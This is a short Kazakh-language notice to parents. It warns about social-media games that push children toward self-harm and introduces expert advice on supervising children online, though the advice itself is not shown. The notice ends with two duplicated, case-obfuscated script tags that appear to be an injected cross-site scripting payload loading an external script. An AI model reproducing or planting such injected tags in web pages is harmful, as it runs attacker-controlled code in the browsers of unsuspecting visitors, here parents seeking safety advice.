Құрметті ата-аналар! Әлеуметтік желілердегі ойындар, ақпараттар барлық балалар мен жасөспірімдерді ойнауға, қызықтыруға тартады. Оның салдарынан балаларда негативті эмоционалды жағдайлар, қорқыныш, мазасыздық дамиды. Құқық қорғау органдарының мамандарының ақпараты бойынша әлеуметтік желілерде балаларды өзіне-өзі қол жұмсауға итермелейтін ойындардан сақ болуын ескертеді. Балалар өздерінің қауіпті жағдайда екенін аңғармайды, сол үшін бірінші кезекте үлкендер тарапынан балаларды бақылау мен қолдауды қажет етеді. Соған байланысты төмендегі "Баланың өмір қауіпсіздігін алдын алу" және "Ата-ана баласының интернетте НЕ ІСТЕП отырғанын қалай БАҚЫЛАЙ алады?" атты мамандардың кеңестерін ұсынамыз.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>